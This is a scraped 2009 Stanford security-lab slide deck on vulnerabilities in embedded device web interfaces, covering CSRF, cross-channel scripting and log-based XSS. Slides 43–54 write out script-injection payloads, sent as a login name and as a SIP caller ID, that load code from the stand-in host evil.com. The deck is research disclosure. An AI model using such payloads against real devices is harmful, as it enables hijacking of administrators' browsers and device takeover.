embedded management interfaces
play

Embedded Management Interfaces e t u p m Emerging Massive - PowerPoint PPT Presentation

Dec 02, 2022 •254 likes •1.86k views

b a L y t i r u c e S r Embedded Management Interfaces e t u p m Emerging Massive Insecurity o C d r o f Hristo Bojinov Elie Bursztein Dan Boneh n a Stanford Computer Security Lab t S Thursday, July 30, 2009

  1. Attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  2. Cross Site Request Forgery (CSRF) illustrated Netgear FS750T2 ‣ Intelligent switch ‣ Configured via Web Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  3. CSRF illustrated Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  4. CSRF illustrated 1 Administer the switch Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  5. CSRF illustrated 1 Administer the switch 2 Browse the web � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  6. CSRF illustrated 1 Administer the switch 2 Browse the web P O S T ( e . g . v i a A d s ) 3 T r i g g e r � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  7. CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web P O S T ( e . g . v i a A d s ) 3 T r i g g e r � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  8. CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web P O S T ( e . g . v i a A d s ) 3 T r i g g e r � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  9. CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web P O S T ( e . g . v i a A d s ) 3 T r i g g e r � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  10. Cross Channel Scripting (XCS) illustrated LaCie Ethernet disk mini ‣ Share access control ‣ Web interface ‣ Public FTP Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  11. XCS illustrated FTP server NAS upload the file: <script>..</script>.pdf Attacker Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  12. XCS illustrated FTP file server system NAS upload the file: <script>..</script>.pdf Attacker Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  13. XCS illustrated FTP file Web server system App NAS upload the file: reflect the filename: <script>..</script>.pdf <script>..</script>.pdf Attacker Admin Browser Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  14. XCS illustrated FTP file Web server system App NAS upload the file: reflect the filename: <script>..</script>.pdf <script>..</script>.pdf Attacker Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  15. Attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  16. XCS: cross-channel scripting Alternate Web Channels attacker Device User Injection Storage Reflection Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  17. Devices as stepping stones Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  18. Devices as stepping stones 1 Administer the device Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  19. Devices as stepping stones 1 Administer the device 2 Browse internet Internet Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  20. Devices as stepping stones 1 Administer the device 2 Browse internet Internet P O S T ( e . g . v i a A d s ) 3 T r i g g e r Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  21. Devices as stepping stones 4 infect the device 2 Browse internet Internet P O S T ( e . g . v i a A d s ) 3 T r i g g e r Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  22. Devices as stepping stones 5 access files Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  23. Devices as stepping stones 6 Send malicious payload 5 access files Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  24. Devices as stepping stones 6 Send malicious payload 5 access files 7 Attack local network Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  25. Devices as stepping stones 6 Send malicious payload 5 access files 7 Attack local network Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  26. Brands Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  27. Devices Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  28. Vulnerabilities by category Type Num XSS CSRF XCS RXCS File Auth LOM 3 Photo 3 NAS 5 Router 1 IP camera 3 IP phone 1 Switch 4 Printer 3 one vulnerability many vulnerability Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  29. Vulnerabilities by category Type Num XSS CSRF XCS RXCS File Auth LOM 3 Photo 3 NAS 5 Router 1 IP camera 3 IP phone 1 Switch 4 Printer 3 one vulnerability many vulnerability Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  30. Devices by Brand Brand Camera LOM NAS Phone Photo Frame Printer Router Switch � Allied � Buffalo � � D-Link � Dell � eStarling � HP � IBM � Intel � Kodak � LaCie � � � � Linksys � Netgear � Panasonic � QNAP � Samsung � SMC � TrendNet Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  31. Attack surface • Confidentiality • Integrity • Availability • Access control • Attribution Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  32. Attack surface result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  33. Attack surface result Confidentiality 5 Steal private data Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  34. Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  35. Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  36. Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device Access files without Access control 23 password Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  37. Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device Access files without Access control 23 password Attribution 22 Don’t log access Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  38. b a L y t i r u c e S r e t u p m o Illustrative Attacks C d r o f n a t S Thursday, July 30, 2009

  39. Login+Log XSS Quick warm-up: LOM LOM basics Log XSS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  40. Login+Log XSS LOM basics ‣ Lights-out recovery, maintenance, inventory tracking ‣ PCI card and chipset varieties available ‣ Separate NIC and admin login* ‣ Low-security default settings ‣ Motherboard connection ‣ Usually invisible to OS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  41. Login+Log XSS Log XSS ‣ Known for a decade ‣ Traditionally injected via DNS ‣ Also see recent IBM BladeCenter advisory http://www.cert.fi/en/reports/2009/vulnerability2009029.html Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  42. Persistant Log-based XSS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  43. Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script> Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  44. Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script> 2 Admin views syslog Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  45. Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script> 2 Admin views syslog � � � � � � � � 3 Payload executes Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  46. Login+Log XSS attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  47. Cross Channel Scripting (XCS) Moving on to real XCS VoIP phone Photo frame Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  48. SIP XCS VoIP phone ‣ Linksys SPA942 ‣ Web interface ‣ SIP support ‣ Call logs Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  49. SIP XCS � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  50. SIP XCS 1 SIP: xyz@mydomain calls abc@thatdomain � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  51. SIP XCS 1 SIP: xyz@mydomain calls abc@thatdomain � � � � � � � � 2 RTP: carries actual binary data Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  52. SIP XCS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  53. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>” Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  54. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>” 2 Administrator accesses web interface Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

Recommend

Effects of I/O Routing Through Column Interfaces in Embedded FPGA Fabrics Christophe Huriaux

Effects of I/O Routing Through Column Interfaces in Embedded FPGA Fabrics Christophe Huriaux

26 th International Conference on Field Programmable Logic and Applications September 1 st , 2016 Effects of I/O Routing Through Column Interfaces in Embedded FPGA Fabrics Christophe Huriaux , Olivier Sentieys , Russell Tessier Inria,

480 views • 21 slides
Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo

Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo

b a L y t i r u c e S r Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo Bojinov Elie Bursztein Dan Boneh n a Stanford Computer Security Lab t S Cross-channel scripting

1.09k views • 68 slides
CSSE 220 Interfaces and Polymorphism Check out Interfaces from SVN Interfaces What, When,

CSSE 220 Interfaces and Polymorphism Check out Interfaces from SVN Interfaces What, When,

CSSE 220 Interfaces and Polymorphism Check out Interfaces from SVN Interfaces What, When, Why, How? What: Code Structure used to express operations that multiple class have in common No method implementations No fields

611 views • 12 slides
Serial Communications time. 3 4 Serial Interfaces Serial vs. Parallel Different from a

Serial Communications time. 3 4 Serial Interfaces Serial vs. Parallel Different from a

1 2 Serial Interfaces Embedded systems often use a serial interface to communicate with other devices. Serial implies that it sends or receives one bit at a Serial Communications time. 3 4 Serial Interfaces Serial vs. Parallel

225 views • 6 slides
Embedded Systems an integrated computational, electrical, and mechanical system

Embedded Systems an integrated computational, electrical, and mechanical system

Embedded Systems Embedded Systems an integrated computational, electrical, and mechanical system www-robotics.cs.umass.edu/~grupen/503 hardware (sensors, actuators), software with RT constraints, interfaces Overview of Our Course low

189 views • 4 slides
T Topic 7 i 7 Interfaces and Abstract Interfaces and Abstract Classes Interfaces Interfaces

T Topic 7 i 7 Interfaces and Abstract Interfaces and Abstract Classes Interfaces Interfaces

T Topic 7 i 7 Interfaces and Abstract Interfaces and Abstract Classes Interfaces Interfaces I prefer Agassiz in the abstract, rather than in the concrete. CS 307 Fundamentals of CS 307 Fundamentals of 1 2 Computer Science

325 views • 10 slides
Component technology in an embedded system David Polberger Masters thesis defense January 27,

Component technology in an embedded system David Polberger Masters thesis defense January 27,

Preliminaries Introduction Evolution Interfaces and COM Sony Ericsson Summary Component technology in an embedded system David Polberger Masters thesis defense January 27, 2010 Preliminaries Introduction Evolution Interfaces and COM

431 views • 28 slides
Implementation, Visualization and User Interfaces Advanced Herd Management Thomas N. Madsen

Implementation, Visualization and User Interfaces Advanced Herd Management Thomas N. Madsen

Implementation, Visualization and User Interfaces Advanced Herd Management Thomas N. Madsen Technology | Network | Management Advanced Herd Management - Implementation, Visualization and User Interfaces Outline GUI Design Making

318 views • 11 slides
Embedded PC The modular Industrial PC for mid-range control Embedded PC 1 Embedded OS

Embedded PC The modular Industrial PC for mid-range control Embedded PC 1 Embedded OS

Embedded PC The modular Industrial PC for mid-range control Embedded PC 1 Embedded OS Operating Systems Major differences Details XPE / CE Embedded PC 2 The Windows Embedded OS family The modular, real The modular, real- -time

611 views • 22 slides
Interfaces Interfaces interface : A list of methods that a class promises to implement.

Interfaces Interfaces interface : A list of methods that a class promises to implement.

Interfaces Interfaces interface : A list of methods that a class promises to implement. Interfaces give you an is-a relationship without code sharing. Only method stubs in the interface Allows object with no common ancestor to act

268 views • 13 slides
Interaction Management for Ubiquitous Augmented Reality User Interfaces CAR - Car Augmented

Interaction Management for Ubiquitous Augmented Reality User Interfaces CAR - Car Augmented

Diplomarbeit Interaction Management for Ubiquitous Augmented Reality User Interfaces CAR - Car Augmented Reality Aufgabensteller: Prof. Gudrun Klinker Ph.D. Betreuer: Dipl.-Inform. Christian Sandor Vortragender: Otmar Hilliges May 13,

740 views • 36 slides
Interfaces Interfaces n interface : A list of methods that a class promises to implement. q

Interfaces Interfaces n interface : A list of methods that a class promises to implement. q

10/21/12 Interfaces Interfaces n interface : A list of methods that a class promises to implement. q Interfaces give you an is-a relationship without code sharing. Only method stubs in the interface n Allows object with no common

420 views • 7 slides
Unit D time. Serial Communications D.3 D.4 Serial vs. Parallel Parallel Interfaces Serial

Unit D time. Serial Communications D.3 D.4 Serial vs. Parallel Parallel Interfaces Serial

D.1 D.2 Serial Interfaces Embedded systems often use a serial interface to communicate with other devices. Serial implies that it sends or receives one bit at a Unit D time. Serial Communications D.3 D.4 Serial vs. Parallel

174 views • 6 slides
Xen Management Interfaces using DMTF CIM Technology Mike D. Day IBM CIM Technology Overview

Xen Management Interfaces using DMTF CIM Technology Mike D. Day IBM CIM Technology Overview

Xen Management Interfaces using DMTF CIM Technology Mike D. Day IBM CIM Technology Overview What is CIM Technology? Schema Description Language Object semantics Inheritance of schema elements Methods and Properties

359 views • 7 slides
CS 349: User Interfaces This course focusses on creating user interfaces (UIs), including

CS 349: User Interfaces This course focusses on creating user interfaces (UIs), including

CS 349: User Interfaces This course focusses on creating user interfaces (UIs), including underlying UI architecture and algorithms, practice implementing UIs using frameworks, and theories and methods relevant to interface design.

603 views • 24 slides
CS 349: User Interfaces This course focuses on creating user interfaces (UIs), including

CS 349: User Interfaces This course focuses on creating user interfaces (UIs), including

CS 349: User Interfaces This course focuses on creating user interfaces (UIs), including underlying UI architecture and algorithms, practice implementing UIs using frameworks, and theories and methods relevant to interface design.

600 views • 20 slides
CS 349: User Interfaces This course focusses on creating user interfaces (UIs), including

CS 349: User Interfaces This course focusses on creating user interfaces (UIs), including

CS 349: User Interfaces This course focusses on creating user interfaces (UIs), including underlying UI architecture and algorithms, practice implementing UIs using frameworks, and theories and methods relevant to interface design.

378 views • 23 slides
SVG for Automotive User SVG for Automotive User Interfaces Interfaces S. Boisgrault, Mines

SVG for Automotive User SVG for Automotive User Interfaces Interfaces S. Boisgrault, Mines

SVG for Automotive User SVG for Automotive User Interfaces Interfaces S. Boisgrault, Mines ParisTech M. Othman Abdallah, Mines ParisTech J.-M. Temmos, Visteon Introduction HMI: human-machine interfaces Design of HMI displays for car

427 views • 24 slides
Supporting Information Management in Digital Libraries with Map-based Interfaces Rudolf Mayer ,

Supporting Information Management in Digital Libraries with Map-based Interfaces Rudolf Mayer ,

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Supporting Information Management in Digital Libraries with Map-based Interfaces Rudolf Mayer , Angela Roiger, Andreas Rauber Vienna University of

883 views • 31 slides
ECE 3574: Applied Software Design Embedded Programming in C++ Today we are going to look at what

ECE 3574: Applied Software Design Embedded Programming in C++ Today we are going to look at what

ECE 3574: Applied Software Design Embedded Programming in C++ Today we are going to look at what subset of C++ is suitable for embedded programming. What is different about embedded systems programming? C or C++? Memory Management

210 views • 17 slides
Anatomy of an Embedded KMS Driver Embedded Linux Conference 2013 San Francisco 2013/02/20

Anatomy of an Embedded KMS Driver Embedded Linux Conference 2013 San Francisco 2013/02/20

Anatomy of an Embedded KMS Driver Embedded Linux Conference 2013 San Francisco 2013/02/20 Laurent Pinchart laurent.pinchart@ideasonboard.com DRM ? KMS APIs Memory Management Vertical Blanking Version, Authentication,

609 views • 48 slides
HW-SW Interfaces HW-SW Interfaces Abstraction and Design Abstraction and Design for

HW-SW Interfaces HW-SW Interfaces Abstraction and Design Abstraction and Design for

HW-SW Interfaces HW-SW Interfaces Abstraction and Design Abstraction and Design for Multi-Processor SoC for Multi-Processor SoC Dr. Ahmed Amine JERRAYA TIMA Laboratory 46 Avenue Felix Viallet 38031 Grenoble Cedex France Tel: +33 476 57 47

634 views • 36 slides
Power Aware Management Middleware for Multiple Radio Interfaces Roy Friedman, Alex Kogan

Power Aware Management Middleware for Multiple Radio Interfaces Roy Friedman, Alex Kogan

Power Aware Management Middleware for Multiple Radio Interfaces Roy Friedman, Alex Kogan Computer Science, Technion Mobile ad hoc networks: what? Formed by wireless mobile devices No fixed infrastructure Nodes route messages over

443 views • 26 slides
Embedded systems and the role of programmable logic devices in embedded systems Embedded system :

Embedded systems and the role of programmable logic devices in embedded systems Embedded system :

Embedded systems and the role of programmable logic devices in embedded systems Embedded system : a combination of computer hardware and software, and perhaps additional mechanical or other parts, designed to perform a dedicated function. In some

414 views • 20 slides

More recommend